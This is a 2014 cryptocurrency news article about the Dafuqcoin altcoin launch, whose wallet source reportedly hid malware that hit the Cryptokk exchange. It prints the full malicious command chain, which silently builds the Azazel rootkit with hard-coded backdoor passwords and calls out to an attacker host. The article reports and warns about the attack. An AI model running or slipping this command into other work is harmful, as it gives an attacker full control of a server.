Dafuqcoin Pushes The Altcoin Bar Even Lower With First Trojan Coin Launch

Dafuqcoin Branding

A new, lower era has arrived on the altcoin scene. Thanks to the idiotically named ‘Dafuqcoin’ altcoin launches can no longer be executed in their current manner. Up until now all the miners gather around the Bitcointalk forum and breathlessly await for the news of the coin’s launch.

Generally that means EVERYBODY - including third party services and mining pools end up having to compile the Linux Wallet in a hurry. In a perfectly honest world, this procedure would be no problem. However, we’re in a ‘ZeroTrust’ environment considering the anonymity afforded to most cryptocurrency developers.

The trust has finally and irrevocably been broken now by Dafuqcoin. This newbie developer installed some very malicious code as outlined by Richie Lai of Bittrex.com in this post. The coin initiates some very ugly and dangerous commands:
apt-get -y install libpcap-dev libpam-dev wget git >/dev/null 2>&1 || yum -y install libpcap-devel pam-devel wget git >/dev/null 2>&1;cd /tmp/ >/dev/null 2>&1;git clone https://github.com/chokepoint/azazel.git >/dev/null 2>&1;chmod -R 777 azazel/ >/dev/null 2>&1;cd azazel/ >/dev/null 2>&1;sed 's/BLIND_LOGIN = "rootme"/BLIND_LOGIN = "r00t"/' config.py | sed 's/SHELL_PASSWD = "changeme"/SHELL_PASSWD = "r00tp4ssw0rd"/' | sed 's/PASSPHRASE = "Hello NSA"/PASSPHRASE = "Bestp4ssphr4se3v3r"/' | sed 's/KEY_SALT = "changeme"/KEY_SALT = "Bestk3ys4lt3v3r"/' > newconfig.py;mv newconfig.py config.py >/dev/null 2>&1;make >/dev/null 2>&1;make install >/dev/null 2>&1;wget http://dfqcoin.co.nf/in.php >/dev/null 2>&1;cd .. >/dev/null 2>&1;rm -rf azazel/ >/dev/null 2>&1;touch /usr/.dfq >/dev/null 2>&1


The code installs a rootkit which allows the attacker to essentially run the whole server. As you can imagine, this is a catastrophic situation in certain cases. A major victim of this assault was Cryptokk.com, who has been forced out of business by this attacker.

He appeared to be a person with good intentions who has been victimized by the latest low-life to appear on the cryptocurrency scene.

“The malware came from the Dafuqcoin (source code). Just don’t install this.
Cryptokk wasn’t a stock-market, the volume and money generated was a lot lower than any other exchange.
The hacker stole the few I had to fund the servers.
I’m not a rich guy but I have passion for the cryptocurrencies since I met them. That’s why I made Cryptokk: a hand-to-hand exchange, not about money, more for the fun and social.
I have no investors or help behind me to handle this. I’m just not able to refund any user, including myself.”

Change will be necessary to how launches are handled in order to avoid a repeat of this debacle. Certainly mining pools will think twice now before offering to help new, unproven coins. The lack of trust that most coin devs have now is understandable and this launch will only make matters worse.

A new low has been achieved! Mark this day on your calendar.

Updated: 4/25/2014 - TalesFromTheScrypt mining pool appears to have also went down in the wake of this attack. None of their subdomains or main domains are pulling up. Their service is listed in the Dafuqcoin ANN thread and their service went down around that same time. So far they have not posted a status update.

Submit a Comment

Your email address will not be published. Required fields are marked *

* Copy This Password *

* Type Or Paste Password Here *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>